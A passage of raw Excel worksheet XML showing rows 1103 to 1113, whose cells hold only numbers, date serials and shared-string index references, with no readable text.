      <c r="AF1103" t="s">
        <v>8321</v>
      </c>
      <c r="AG1103">
        <v>90553</v>
      </c>
      <c r="AH1103">
        <v>26</v>
      </c>
      <c r="AJ1103">
        <v>406</v>
      </c>
      <c r="AK1103" t="s">
        <v>8322</v>
      </c>
      <c r="AL1103" t="s">
        <v>8323</v>
      </c>
      <c r="AM1103" t="s">
        <v>8324</v>
      </c>
      <c r="AN1103" t="s">
        <v>68</v>
      </c>
      <c r="AO1103">
        <v>2016</v>
      </c>
      <c r="AP1103" t="s">
        <v>8325</v>
      </c>
      <c r="AQ1103" t="s">
        <v>8326</v>
      </c>
      <c r="AR1103" t="s">
        <v>8321</v>
      </c>
      <c r="AS1103" t="s">
        <v>71</v>
      </c>
      <c r="AT1103" t="s">
        <v>72</v>
      </c>
      <c r="AU1103">
        <v>5</v>
      </c>
      <c r="AV1103">
        <v>1</v>
      </c>
      <c r="AW1103">
        <v>0</v>
      </c>
      <c r="AX1103">
        <v>0</v>
      </c>
      <c r="AY1103">
        <v>2</v>
      </c>
      <c r="AZ1103">
        <v>1</v>
      </c>
      <c r="BA1103" t="s">
        <v>17633</v>
      </c>
      <c r="BB1103" t="s">
        <v>16115</v>
      </c>
      <c r="BC1103" t="s">
        <v>9522</v>
      </c>
      <c r="BD1103" t="s">
        <v>12891</v>
      </c>
    </row>
    <row r="1104" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1104">
        <v>5240</v>
      </c>
      <c r="B1104" t="s">
        <v>8327</v>
      </c>
      <c r="C1104" t="s">
        <v>74</v>
      </c>
      <c r="D1104" t="s">
        <v>8328</v>
      </c>
      <c r="E1104" t="s">
        <v>142</v>
      </c>
      <c r="F1104" t="s">
        <v>8329</v>
      </c>
      <c r="G1104" s="1">
        <v>44251</v>
      </c>
      <c r="H1104">
        <v>8278</v>
      </c>
      <c r="I1104">
        <v>8278</v>
      </c>
      <c r="J1104">
        <v>3</v>
      </c>
      <c r="K1104">
        <v>0</v>
      </c>
      <c r="L1104">
        <v>1</v>
      </c>
      <c r="M1104">
        <v>0</v>
      </c>
      <c r="N1104">
        <v>0</v>
      </c>
      <c r="O1104">
        <v>0</v>
      </c>
      <c r="P1104">
        <v>0</v>
      </c>
      <c r="Q1104">
        <v>2</v>
      </c>
      <c r="R1104">
        <v>10</v>
      </c>
      <c r="S1104">
        <v>0</v>
      </c>
      <c r="T1104">
        <v>1</v>
      </c>
      <c r="U1104">
        <v>90000</v>
      </c>
      <c r="V1104">
        <v>0</v>
      </c>
      <c r="W1104">
        <v>5000</v>
      </c>
      <c r="X1104">
        <v>0</v>
      </c>
      <c r="Y1104">
        <v>0</v>
      </c>
      <c r="Z1104">
        <v>0</v>
      </c>
      <c r="AA1104">
        <v>0</v>
      </c>
      <c r="AB1104">
        <v>500</v>
      </c>
      <c r="AC1104">
        <v>2200</v>
      </c>
      <c r="AD1104">
        <v>0</v>
      </c>
      <c r="AE1104">
        <v>5000</v>
      </c>
      <c r="AF1104" t="s">
        <v>8330</v>
      </c>
      <c r="AG1104">
        <v>50181</v>
      </c>
      <c r="AH1104">
        <v>14</v>
      </c>
      <c r="AJ1104">
        <v>220</v>
      </c>
      <c r="AK1104" t="s">
        <v>812</v>
      </c>
      <c r="AL1104" t="s">
        <v>813</v>
      </c>
      <c r="AM1104" t="s">
        <v>8331</v>
      </c>
      <c r="AN1104" t="s">
        <v>55</v>
      </c>
      <c r="AO1104">
        <v>2020</v>
      </c>
      <c r="AP1104" t="s">
        <v>8332</v>
      </c>
      <c r="AQ1104" t="s">
        <v>8333</v>
      </c>
      <c r="AR1104" t="s">
        <v>8334</v>
      </c>
      <c r="AS1104" t="s">
        <v>71</v>
      </c>
      <c r="AT1104" t="s">
        <v>58</v>
      </c>
      <c r="AU1104">
        <v>25</v>
      </c>
      <c r="AV1104">
        <v>0</v>
      </c>
      <c r="AW1104">
        <v>11</v>
      </c>
      <c r="AX1104">
        <v>31</v>
      </c>
      <c r="AY1104">
        <v>2</v>
      </c>
      <c r="AZ1104">
        <v>1</v>
      </c>
      <c r="BA1104" t="s">
        <v>17634</v>
      </c>
      <c r="BB1104">
        <v>0</v>
      </c>
      <c r="BC1104">
        <v>0</v>
      </c>
      <c r="BD1104" t="s">
        <v>12846</v>
      </c>
    </row>
    <row r="1105" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1105">
        <v>5197</v>
      </c>
      <c r="B1105" t="s">
        <v>8335</v>
      </c>
      <c r="C1105" t="s">
        <v>129</v>
      </c>
      <c r="D1105" t="s">
        <v>8336</v>
      </c>
      <c r="E1105" t="s">
        <v>363</v>
      </c>
      <c r="F1105" t="s">
        <v>547</v>
      </c>
      <c r="G1105" s="1">
        <v>44232</v>
      </c>
      <c r="H1105">
        <v>8309</v>
      </c>
      <c r="I1105">
        <v>8309</v>
      </c>
      <c r="J1105">
        <v>0</v>
      </c>
      <c r="K1105">
        <v>0</v>
      </c>
      <c r="L1105">
        <v>0</v>
      </c>
      <c r="M1105">
        <v>0</v>
      </c>
      <c r="N1105">
        <v>0</v>
      </c>
      <c r="O1105">
        <v>0</v>
      </c>
      <c r="P1105">
        <v>0</v>
      </c>
      <c r="Q1105">
        <v>0</v>
      </c>
      <c r="R1105">
        <v>1</v>
      </c>
      <c r="S1105">
        <v>0</v>
      </c>
      <c r="T1105">
        <v>1</v>
      </c>
      <c r="U1105">
        <v>0</v>
      </c>
      <c r="V1105">
        <v>0</v>
      </c>
      <c r="W1105">
        <v>0</v>
      </c>
      <c r="X1105">
        <v>0</v>
      </c>
      <c r="Y1105">
        <v>0</v>
      </c>
      <c r="Z1105">
        <v>0</v>
      </c>
      <c r="AA1105">
        <v>0</v>
      </c>
      <c r="AB1105">
        <v>0</v>
      </c>
      <c r="AC1105">
        <v>100</v>
      </c>
      <c r="AD1105">
        <v>0</v>
      </c>
      <c r="AE1105">
        <v>1000</v>
      </c>
      <c r="AF1105" t="s">
        <v>8337</v>
      </c>
      <c r="AG1105">
        <v>15415</v>
      </c>
      <c r="AH1105">
        <v>11</v>
      </c>
      <c r="AJ1105">
        <v>273</v>
      </c>
      <c r="AK1105" t="s">
        <v>8338</v>
      </c>
      <c r="AL1105" t="s">
        <v>8339</v>
      </c>
      <c r="AM1105" t="s">
        <v>8340</v>
      </c>
      <c r="AN1105" t="s">
        <v>68</v>
      </c>
      <c r="AO1105">
        <v>2020</v>
      </c>
      <c r="AP1105">
        <v>217414934</v>
      </c>
      <c r="AQ1105">
        <v>217414934</v>
      </c>
      <c r="AR1105" t="s">
        <v>8341</v>
      </c>
      <c r="AS1105" t="s">
        <v>71</v>
      </c>
      <c r="AT1105" t="s">
        <v>72</v>
      </c>
      <c r="AU1105">
        <v>26</v>
      </c>
      <c r="AV1105">
        <v>0</v>
      </c>
      <c r="AW1105">
        <v>0</v>
      </c>
      <c r="AX1105">
        <v>0</v>
      </c>
      <c r="AY1105">
        <v>10</v>
      </c>
      <c r="AZ1105">
        <v>3</v>
      </c>
      <c r="BA1105" t="s">
        <v>17621</v>
      </c>
      <c r="BB1105">
        <v>0</v>
      </c>
      <c r="BC1105">
        <v>0</v>
      </c>
      <c r="BD1105" t="s">
        <v>12850</v>
      </c>
    </row>
    <row r="1106" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1106">
        <v>5251</v>
      </c>
      <c r="B1106" t="s">
        <v>8342</v>
      </c>
      <c r="C1106" t="s">
        <v>726</v>
      </c>
      <c r="D1106" t="s">
        <v>8343</v>
      </c>
      <c r="E1106" t="s">
        <v>142</v>
      </c>
      <c r="F1106" t="s">
        <v>285</v>
      </c>
      <c r="G1106" s="1">
        <v>44216</v>
      </c>
      <c r="H1106">
        <v>8350</v>
      </c>
      <c r="I1106">
        <v>8350</v>
      </c>
      <c r="J1106">
        <v>2</v>
      </c>
      <c r="K1106">
        <v>1</v>
      </c>
      <c r="L1106">
        <v>2</v>
      </c>
      <c r="M1106">
        <v>300</v>
      </c>
      <c r="N1106">
        <v>0</v>
      </c>
      <c r="O1106">
        <v>0</v>
      </c>
      <c r="P1106">
        <v>0</v>
      </c>
      <c r="Q1106">
        <v>2</v>
      </c>
      <c r="R1106">
        <v>1</v>
      </c>
      <c r="S1106">
        <v>0</v>
      </c>
      <c r="T1106">
        <v>1</v>
      </c>
      <c r="U1106">
        <v>10000</v>
      </c>
      <c r="V1106">
        <v>50</v>
      </c>
      <c r="W1106">
        <v>10000</v>
      </c>
      <c r="X1106">
        <v>10</v>
      </c>
      <c r="Y1106">
        <v>0</v>
      </c>
      <c r="Z1106">
        <v>0</v>
      </c>
      <c r="AA1106">
        <v>0</v>
      </c>
      <c r="AB1106">
        <v>5000</v>
      </c>
      <c r="AC1106">
        <v>2000</v>
      </c>
      <c r="AD1106">
        <v>0</v>
      </c>
      <c r="AE1106">
        <v>10000</v>
      </c>
      <c r="AF1106" t="s">
        <v>8344</v>
      </c>
      <c r="AG1106">
        <v>97752</v>
      </c>
      <c r="AH1106">
        <v>32</v>
      </c>
      <c r="AJ1106">
        <v>463</v>
      </c>
      <c r="AK1106" t="s">
        <v>8345</v>
      </c>
      <c r="AL1106" t="s">
        <v>8346</v>
      </c>
      <c r="AM1106" t="s">
        <v>8347</v>
      </c>
      <c r="AN1106" t="s">
        <v>55</v>
      </c>
      <c r="AO1106">
        <v>2019</v>
      </c>
      <c r="AP1106">
        <v>82292809491</v>
      </c>
      <c r="AQ1106" t="s">
        <v>8348</v>
      </c>
      <c r="AR1106" t="s">
        <v>8344</v>
      </c>
      <c r="AS1106" t="s">
        <v>71</v>
      </c>
      <c r="AT1106" t="s">
        <v>58</v>
      </c>
      <c r="AU1106">
        <v>30</v>
      </c>
      <c r="AV1106">
        <v>30</v>
      </c>
      <c r="AW1106">
        <v>5</v>
      </c>
      <c r="AX1106">
        <v>6</v>
      </c>
      <c r="AY1106">
        <v>1</v>
      </c>
      <c r="AZ1106">
        <v>2</v>
      </c>
      <c r="BA1106" t="s">
        <v>17641</v>
      </c>
      <c r="BB1106">
        <v>0</v>
      </c>
      <c r="BC1106" t="s">
        <v>12876</v>
      </c>
      <c r="BD1106" t="s">
        <v>12877</v>
      </c>
    </row>
    <row r="1107" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1107">
        <v>5244</v>
      </c>
      <c r="B1107" t="s">
        <v>8349</v>
      </c>
      <c r="C1107" t="s">
        <v>2060</v>
      </c>
      <c r="D1107" t="s">
        <v>8350</v>
      </c>
      <c r="E1107" t="s">
        <v>111</v>
      </c>
      <c r="F1107" t="s">
        <v>1223</v>
      </c>
      <c r="G1107" s="1">
        <v>44238</v>
      </c>
      <c r="H1107">
        <v>8386</v>
      </c>
      <c r="I1107">
        <v>8386</v>
      </c>
      <c r="J1107">
        <v>0</v>
      </c>
      <c r="K1107">
        <v>1</v>
      </c>
      <c r="L1107">
        <v>1</v>
      </c>
      <c r="M1107">
        <v>0</v>
      </c>
      <c r="N1107">
        <v>0</v>
      </c>
      <c r="O1107">
        <v>0</v>
      </c>
      <c r="P1107">
        <v>0</v>
      </c>
      <c r="Q1107">
        <v>0</v>
      </c>
      <c r="R1107">
        <v>1</v>
      </c>
      <c r="S1107">
        <v>1</v>
      </c>
      <c r="T1107">
        <v>1</v>
      </c>
      <c r="U1107">
        <v>0</v>
      </c>
      <c r="V1107">
        <v>35</v>
      </c>
      <c r="W1107">
        <v>5000</v>
      </c>
      <c r="X1107">
        <v>0</v>
      </c>
      <c r="Y1107">
        <v>0</v>
      </c>
      <c r="Z1107">
        <v>0</v>
      </c>
      <c r="AA1107">
        <v>0</v>
      </c>
      <c r="AB1107">
        <v>0</v>
      </c>
      <c r="AC1107">
        <v>1000</v>
      </c>
      <c r="AD1107">
        <v>1</v>
      </c>
      <c r="AE1107">
        <v>0</v>
      </c>
      <c r="AF1107" t="s">
        <v>8351</v>
      </c>
      <c r="AG1107">
        <v>96116</v>
      </c>
      <c r="AH1107">
        <v>25</v>
      </c>
      <c r="AJ1107">
        <v>445</v>
      </c>
      <c r="AK1107" t="s">
        <v>8352</v>
      </c>
      <c r="AL1107" t="s">
        <v>8353</v>
      </c>
      <c r="AM1107" t="s">
        <v>8354</v>
      </c>
      <c r="AN1107" t="s">
        <v>55</v>
      </c>
      <c r="AO1107">
        <v>2019</v>
      </c>
      <c r="AP1107">
        <v>82191388953</v>
      </c>
      <c r="AQ1107">
        <v>82191388953</v>
      </c>
      <c r="AR1107" t="s">
        <v>8351</v>
      </c>
      <c r="AS1107" t="s">
        <v>71</v>
      </c>
      <c r="AT1107" t="s">
        <v>58</v>
      </c>
      <c r="AU1107">
        <v>30</v>
      </c>
      <c r="AV1107">
        <v>30</v>
      </c>
      <c r="AW1107">
        <v>1</v>
      </c>
      <c r="AX1107">
        <v>0</v>
      </c>
      <c r="AY1107">
        <v>4</v>
      </c>
      <c r="AZ1107">
        <v>1</v>
      </c>
      <c r="BA1107" t="s">
        <v>17637</v>
      </c>
      <c r="BB1107" t="s">
        <v>16119</v>
      </c>
      <c r="BC1107" t="s">
        <v>12915</v>
      </c>
      <c r="BD1107" t="s">
        <v>9810</v>
      </c>
    </row>
    <row r="1108" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1108">
        <v>5205</v>
      </c>
      <c r="B1108" t="s">
        <v>6100</v>
      </c>
      <c r="C1108" t="s">
        <v>157</v>
      </c>
      <c r="D1108" t="s">
        <v>8355</v>
      </c>
      <c r="E1108" t="s">
        <v>363</v>
      </c>
      <c r="F1108" t="s">
        <v>364</v>
      </c>
      <c r="G1108" s="1">
        <v>44232</v>
      </c>
      <c r="H1108">
        <v>8393</v>
      </c>
      <c r="I1108">
        <v>8393</v>
      </c>
      <c r="J1108">
        <v>0</v>
      </c>
      <c r="K1108">
        <v>0</v>
      </c>
      <c r="L1108">
        <v>0</v>
      </c>
      <c r="M1108">
        <v>0</v>
      </c>
      <c r="N1108">
        <v>0</v>
      </c>
      <c r="O1108">
        <v>0</v>
      </c>
      <c r="P1108">
        <v>0</v>
      </c>
      <c r="Q1108">
        <v>0</v>
      </c>
      <c r="R1108">
        <v>0</v>
      </c>
      <c r="S1108">
        <v>1</v>
      </c>
      <c r="T1108">
        <v>1</v>
      </c>
      <c r="U1108">
        <v>0</v>
      </c>
      <c r="V1108">
        <v>0</v>
      </c>
      <c r="W1108">
        <v>0</v>
      </c>
      <c r="X1108">
        <v>0</v>
      </c>
      <c r="Y1108">
        <v>0</v>
      </c>
      <c r="Z1108">
        <v>0</v>
      </c>
      <c r="AA1108">
        <v>0</v>
      </c>
      <c r="AB1108">
        <v>0</v>
      </c>
      <c r="AC1108">
        <v>0</v>
      </c>
      <c r="AD1108">
        <v>1</v>
      </c>
      <c r="AE1108">
        <v>125000</v>
      </c>
      <c r="AF1108" t="s">
        <v>6102</v>
      </c>
      <c r="AG1108">
        <v>61252</v>
      </c>
      <c r="AH1108">
        <v>16</v>
      </c>
      <c r="AJ1108">
        <v>242</v>
      </c>
      <c r="AK1108" t="s">
        <v>706</v>
      </c>
      <c r="AL1108" t="s">
        <v>8356</v>
      </c>
      <c r="AM1108" t="s">
        <v>6103</v>
      </c>
      <c r="AN1108" t="s">
        <v>55</v>
      </c>
      <c r="AO1108">
        <v>2018</v>
      </c>
      <c r="AP1108">
        <v>81249852617</v>
      </c>
      <c r="AQ1108" t="s">
        <v>6104</v>
      </c>
      <c r="AR1108" t="s">
        <v>6102</v>
      </c>
      <c r="AS1108" t="s">
        <v>371</v>
      </c>
      <c r="AT1108" t="s">
        <v>58</v>
      </c>
      <c r="AU1108">
        <v>26</v>
      </c>
      <c r="AV1108">
        <v>1</v>
      </c>
      <c r="AW1108">
        <v>7</v>
      </c>
      <c r="AX1108">
        <v>0</v>
      </c>
      <c r="AY1108">
        <v>2</v>
      </c>
      <c r="AZ1108">
        <v>1</v>
      </c>
      <c r="BA1108" t="s">
        <v>16931</v>
      </c>
      <c r="BB1108" t="s">
        <v>15870</v>
      </c>
      <c r="BC1108">
        <v>0</v>
      </c>
      <c r="BD1108" t="s">
        <v>12846</v>
      </c>
    </row>
    <row r="1109" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1109">
        <v>5242</v>
      </c>
      <c r="B1109" t="s">
        <v>8357</v>
      </c>
      <c r="C1109" t="s">
        <v>2760</v>
      </c>
      <c r="D1109" t="s">
        <v>8358</v>
      </c>
      <c r="E1109" t="s">
        <v>1245</v>
      </c>
      <c r="F1109" t="s">
        <v>8359</v>
      </c>
      <c r="G1109" s="1">
        <v>44323</v>
      </c>
      <c r="H1109">
        <v>8406</v>
      </c>
      <c r="I1109">
        <v>8406</v>
      </c>
      <c r="J1109">
        <v>0</v>
      </c>
      <c r="K1109">
        <v>0</v>
      </c>
      <c r="L1109">
        <v>0</v>
      </c>
      <c r="M1109">
        <v>0</v>
      </c>
      <c r="N1109">
        <v>0</v>
      </c>
      <c r="O1109">
        <v>0</v>
      </c>
      <c r="P1109">
        <v>0</v>
      </c>
      <c r="Q1109">
        <v>1</v>
      </c>
      <c r="R1109">
        <v>10</v>
      </c>
      <c r="S1109">
        <v>1</v>
      </c>
      <c r="T1109">
        <v>0</v>
      </c>
      <c r="U1109">
        <v>0</v>
      </c>
      <c r="V1109">
        <v>0</v>
      </c>
      <c r="W1109">
        <v>0</v>
      </c>
      <c r="X1109">
        <v>0</v>
      </c>
      <c r="Y1109">
        <v>0</v>
      </c>
      <c r="Z1109">
        <v>0</v>
      </c>
      <c r="AA1109">
        <v>0</v>
      </c>
      <c r="AB1109">
        <v>100</v>
      </c>
      <c r="AC1109">
        <v>1000</v>
      </c>
      <c r="AD1109">
        <v>1</v>
      </c>
      <c r="AE1109">
        <v>0</v>
      </c>
      <c r="AF1109" t="s">
        <v>8360</v>
      </c>
      <c r="AG1109">
        <v>83362</v>
      </c>
      <c r="AH1109">
        <v>18</v>
      </c>
      <c r="AJ1109">
        <v>283</v>
      </c>
      <c r="AK1109" t="s">
        <v>93</v>
      </c>
      <c r="AL1109" t="s">
        <v>8361</v>
      </c>
      <c r="AM1109" t="s">
        <v>8362</v>
      </c>
      <c r="AN1109" t="s">
        <v>68</v>
      </c>
      <c r="AO1109">
        <v>2020</v>
      </c>
      <c r="AP1109">
        <v>81336511033</v>
      </c>
      <c r="AQ1109" t="s">
        <v>8363</v>
      </c>
      <c r="AR1109" t="s">
        <v>8360</v>
      </c>
      <c r="AS1109" t="s">
        <v>71</v>
      </c>
      <c r="AT1109" t="s">
        <v>58</v>
      </c>
      <c r="AU1109">
        <v>30</v>
      </c>
      <c r="AV1109">
        <v>1</v>
      </c>
      <c r="AW1109">
        <v>3</v>
      </c>
      <c r="AX1109">
        <v>5</v>
      </c>
      <c r="AY1109">
        <v>2</v>
      </c>
      <c r="AZ1109">
        <v>0</v>
      </c>
      <c r="BA1109" t="s">
        <v>17635</v>
      </c>
      <c r="BB1109" t="s">
        <v>16116</v>
      </c>
      <c r="BC1109" t="s">
        <v>13239</v>
      </c>
      <c r="BD1109">
        <v>0</v>
      </c>
    </row>
    <row r="1110" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1110">
        <v>5237</v>
      </c>
      <c r="B1110" t="s">
        <v>8364</v>
      </c>
      <c r="C1110" t="s">
        <v>726</v>
      </c>
      <c r="D1110" t="s">
        <v>8365</v>
      </c>
      <c r="E1110" t="s">
        <v>300</v>
      </c>
      <c r="F1110" t="s">
        <v>8366</v>
      </c>
      <c r="G1110" s="1">
        <v>44216</v>
      </c>
      <c r="H1110">
        <v>8429</v>
      </c>
      <c r="I1110">
        <v>8429</v>
      </c>
      <c r="J1110">
        <v>0</v>
      </c>
      <c r="K1110">
        <v>1</v>
      </c>
      <c r="L1110">
        <v>1</v>
      </c>
      <c r="M1110">
        <v>0</v>
      </c>
      <c r="N1110">
        <v>0</v>
      </c>
      <c r="O1110">
        <v>0</v>
      </c>
      <c r="P1110">
        <v>0</v>
      </c>
      <c r="Q1110">
        <v>1</v>
      </c>
      <c r="R1110">
        <v>1</v>
      </c>
      <c r="S1110">
        <v>0</v>
      </c>
      <c r="T1110">
        <v>1</v>
      </c>
      <c r="U1110">
        <v>0</v>
      </c>
      <c r="V1110">
        <v>0</v>
      </c>
      <c r="W1110">
        <v>3</v>
      </c>
      <c r="X1110">
        <v>0</v>
      </c>
      <c r="Y1110">
        <v>0</v>
      </c>
      <c r="Z1110">
        <v>0</v>
      </c>
      <c r="AA1110">
        <v>0</v>
      </c>
      <c r="AB1110">
        <v>0</v>
      </c>
      <c r="AC1110">
        <v>1</v>
      </c>
      <c r="AD1110">
        <v>0</v>
      </c>
      <c r="AE1110">
        <v>0</v>
      </c>
      <c r="AF1110" t="s">
        <v>8367</v>
      </c>
      <c r="AG1110">
        <v>97727</v>
      </c>
      <c r="AH1110">
        <v>32</v>
      </c>
      <c r="AJ1110">
        <v>471</v>
      </c>
      <c r="AK1110" t="s">
        <v>8368</v>
      </c>
      <c r="AL1110" t="s">
        <v>8369</v>
      </c>
      <c r="AM1110" t="s">
        <v>8370</v>
      </c>
      <c r="AN1110" t="s">
        <v>55</v>
      </c>
      <c r="AO1110">
        <v>2019</v>
      </c>
      <c r="AP1110">
        <v>82393132666</v>
      </c>
      <c r="AQ1110" t="s">
        <v>8371</v>
      </c>
      <c r="AR1110" t="s">
        <v>8372</v>
      </c>
      <c r="AS1110" t="s">
        <v>71</v>
      </c>
      <c r="AT1110" t="s">
        <v>58</v>
      </c>
      <c r="AU1110">
        <v>26</v>
      </c>
      <c r="AV1110">
        <v>0</v>
      </c>
      <c r="AW1110">
        <v>4</v>
      </c>
      <c r="AX1110">
        <v>0</v>
      </c>
      <c r="AY1110">
        <v>5</v>
      </c>
      <c r="AZ1110">
        <v>3</v>
      </c>
      <c r="BA1110" t="s">
        <v>17632</v>
      </c>
      <c r="BB1110">
        <v>0</v>
      </c>
      <c r="BC1110" t="s">
        <v>9746</v>
      </c>
      <c r="BD1110" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="1111" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1111">
        <v>5255</v>
      </c>
      <c r="B1111" t="s">
        <v>8373</v>
      </c>
      <c r="C1111" t="s">
        <v>318</v>
      </c>
      <c r="D1111" t="s">
        <v>8374</v>
      </c>
      <c r="E1111" t="s">
        <v>363</v>
      </c>
      <c r="F1111" t="s">
        <v>364</v>
      </c>
      <c r="G1111" s="1">
        <v>44251</v>
      </c>
      <c r="H1111">
        <v>8438</v>
      </c>
      <c r="I1111">
        <v>8438</v>
      </c>
      <c r="J1111">
        <v>0</v>
      </c>
      <c r="K1111">
        <v>0</v>
      </c>
      <c r="L1111">
        <v>0</v>
      </c>
      <c r="M1111">
        <v>0</v>
      </c>
      <c r="N1111">
        <v>0</v>
      </c>
      <c r="O1111">
        <v>0</v>
      </c>
      <c r="P1111">
        <v>0</v>
      </c>
      <c r="Q1111">
        <v>0</v>
      </c>
      <c r="R1111">
        <v>0</v>
      </c>
      <c r="S1111">
        <v>0</v>
      </c>
      <c r="T1111">
        <v>1</v>
      </c>
      <c r="U1111">
        <v>0</v>
      </c>
      <c r="V1111">
        <v>0</v>
      </c>
      <c r="W1111">
        <v>0</v>
      </c>
      <c r="X1111">
        <v>0</v>
      </c>
      <c r="Y1111">
        <v>0</v>
      </c>
      <c r="Z1111">
        <v>0</v>
      </c>
      <c r="AA1111">
        <v>0</v>
      </c>
      <c r="AB1111">
        <v>0</v>
      </c>
      <c r="AC1111">
        <v>0</v>
      </c>
      <c r="AD1111">
        <v>0</v>
      </c>
      <c r="AE1111">
        <v>500000</v>
      </c>
      <c r="AF1111" t="s">
        <v>8375</v>
      </c>
      <c r="AG1111">
        <v>90551</v>
      </c>
      <c r="AH1111">
        <v>26</v>
      </c>
      <c r="AJ1111">
        <v>406</v>
      </c>
      <c r="AK1111" t="s">
        <v>647</v>
      </c>
      <c r="AL1111" t="s">
        <v>8376</v>
      </c>
      <c r="AM1111" t="s">
        <v>8377</v>
      </c>
      <c r="AN1111" t="s">
        <v>55</v>
      </c>
      <c r="AO1111">
        <v>2017</v>
      </c>
      <c r="AP1111">
        <v>4118912894</v>
      </c>
      <c r="AQ1111" t="s">
        <v>8378</v>
      </c>
      <c r="AR1111" t="s">
        <v>8379</v>
      </c>
      <c r="AS1111" t="s">
        <v>371</v>
      </c>
      <c r="AT1111" t="s">
        <v>58</v>
      </c>
      <c r="AU1111">
        <v>0</v>
      </c>
      <c r="AV1111">
        <v>0</v>
      </c>
      <c r="AW1111">
        <v>3</v>
      </c>
      <c r="AX1111">
        <v>2</v>
      </c>
      <c r="AY1111">
        <v>4</v>
      </c>
      <c r="AZ1111">
        <v>1</v>
      </c>
      <c r="BA1111" t="s">
        <v>17642</v>
      </c>
      <c r="BB1111" t="s">
        <v>16120</v>
      </c>
      <c r="BC1111" t="s">
        <v>12897</v>
      </c>
      <c r="BD1111" t="s">
        <v>9713</v>
      </c>
    </row>
    <row r="1112" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1112">
        <v>5234</v>
      </c>
      <c r="B1112" t="s">
        <v>8380</v>
      </c>
      <c r="C1112" t="s">
        <v>2848</v>
      </c>
      <c r="D1112" t="s">
        <v>8381</v>
      </c>
      <c r="E1112" t="s">
        <v>142</v>
      </c>
      <c r="F1112" t="s">
        <v>666</v>
      </c>
      <c r="G1112" s="1">
        <v>44237</v>
      </c>
      <c r="H1112">
        <v>8476</v>
      </c>
      <c r="I1112">
        <v>8476</v>
      </c>
      <c r="J1112">
        <v>1</v>
      </c>
      <c r="K1112">
        <v>0</v>
      </c>
      <c r="L1112">
        <v>0</v>
      </c>
      <c r="M1112">
        <v>0</v>
      </c>
      <c r="N1112">
        <v>0</v>
      </c>
      <c r="O1112">
        <v>0</v>
      </c>
      <c r="P1112">
        <v>0</v>
      </c>
      <c r="Q1112">
        <v>1</v>
      </c>
      <c r="R1112">
        <v>0</v>
      </c>
      <c r="S1112">
        <v>0</v>
      </c>
      <c r="T1112">
        <v>0</v>
      </c>
      <c r="U1112">
        <v>750000</v>
      </c>
      <c r="V1112">
        <v>0</v>
      </c>
      <c r="W1112">
        <v>0</v>
      </c>
      <c r="X1112">
        <v>0</v>
      </c>
      <c r="Y1112">
        <v>0</v>
      </c>
      <c r="Z1112">
        <v>0</v>
      </c>
      <c r="AA1112">
        <v>0</v>
      </c>
      <c r="AB1112">
        <v>0</v>
      </c>
      <c r="AC1112">
        <v>0</v>
      </c>
      <c r="AD1112">
        <v>0</v>
      </c>
      <c r="AE1112">
        <v>0</v>
      </c>
      <c r="AF1112" t="s">
        <v>8382</v>
      </c>
      <c r="AG1112">
        <v>32111</v>
      </c>
      <c r="AH1112">
        <v>9</v>
      </c>
      <c r="AJ1112">
        <v>99</v>
      </c>
      <c r="AK1112" t="s">
        <v>8259</v>
      </c>
      <c r="AL1112" t="s">
        <v>8383</v>
      </c>
      <c r="AM1112" t="s">
        <v>8384</v>
      </c>
      <c r="AN1112" t="s">
        <v>55</v>
      </c>
      <c r="AO1112">
        <v>2000</v>
      </c>
      <c r="AP1112">
        <v>81271034698</v>
      </c>
      <c r="AQ1112" t="s">
        <v>8385</v>
      </c>
      <c r="AR1112" t="s">
        <v>8382</v>
      </c>
      <c r="AS1112" t="s">
        <v>179</v>
      </c>
      <c r="AT1112" t="s">
        <v>58</v>
      </c>
      <c r="AU1112">
        <v>6</v>
      </c>
      <c r="AV1112">
        <v>1</v>
      </c>
      <c r="AW1112">
        <v>9</v>
      </c>
      <c r="AX1112">
        <v>1</v>
      </c>
      <c r="AY1112">
        <v>15</v>
      </c>
      <c r="AZ1112">
        <v>5</v>
      </c>
      <c r="BA1112" t="s">
        <v>17631</v>
      </c>
      <c r="BB1112" t="e">
        <v>#N/A</v>
      </c>
      <c r="BC1112" t="s">
        <v>12911</v>
      </c>
      <c r="BD1112">
        <v>0</v>
      </c>
    </row>
    <row r="1113" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1113">
        <v>5270</v>
      </c>
      <c r="B1113" t="s">
        <v>3535</v>
      </c>
      <c r="C1113" t="s">
        <v>157</v>
      </c>
      <c r="D1113" t="s">
        <v>8386</v>
      </c>
      <c r="E1113" t="s">
        <v>142</v>
      </c>
      <c r="F1113" t="s">
        <v>562</v>
      </c>
      <c r="G1113" s="1">
        <v>44232</v>
      </c>
      <c r="H1113">
        <v>8484</v>
      </c>
      <c r="I1113">
        <v>8484</v>
      </c>
      <c r="J1113">
        <v>2</v>
      </c>
      <c r="K1113">
        <v>0</v>
      </c>
      <c r="L1113">
        <v>0</v>
      </c>
      <c r="M1113">
        <v>0</v>
      </c>
      <c r="N1113">
        <v>1500</v>
      </c>
      <c r="O1113">
        <v>0</v>
      </c>
      <c r="P1113">
        <v>0</v>
      </c>
      <c r="Q1113">
        <v>0</v>
      </c>
      <c r="R1113">
        <v>0</v>
      </c>
      <c r="S1113">
        <v>0</v>
      </c>
      <c r="T1113">
        <v>0</v>
      </c>
      <c r="U1113">
        <v>350000</v>
      </c>
      <c r="V1113">
        <v>0</v>
      </c>
      <c r="W1113">
        <v>0</v>
      </c>
      <c r="X1113">
        <v>0</v>
      </c>
      <c r="Y1113">
        <v>0</v>
      </c>
      <c r="Z1113">
        <v>0</v>
      </c>
      <c r="AA1113">
        <v>0</v>
      </c>
      <c r="AB1113">
        <v>0</v>
      </c>
      <c r="AC1113">
        <v>0</v>
      </c>
      <c r="AD1113">
        <v>0</v>
      </c>
      <c r="AE1113">
        <v>0</v>
      </c>
      <c r="AF1113" t="s">
        <v>3537</v>
      </c>
      <c r="AG1113">
        <v>61252</v>
      </c>
      <c r="AH1113">
        <v>16</v>
      </c>
      <c r="AJ1113">
        <v>242</v>
      </c>
      <c r="AK1113" t="s">
        <v>706</v>
      </c>
